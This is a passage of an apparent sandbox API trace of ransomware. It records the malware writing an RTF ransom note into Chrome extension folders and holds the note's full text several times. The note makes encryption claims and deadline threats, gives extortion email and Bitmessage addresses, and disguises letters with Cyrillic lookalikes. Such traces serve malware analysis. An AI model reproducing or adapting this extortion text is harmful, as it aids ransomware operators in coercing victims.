\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0282.147] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0282.147] CloseHandle (hObject=0x2c8) returned 1 [0282.147] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\#readme_eman#.rtf")) returned 0xffffffff [0282.147] GetLastError () returned 0x2 [0282.147] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0282.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 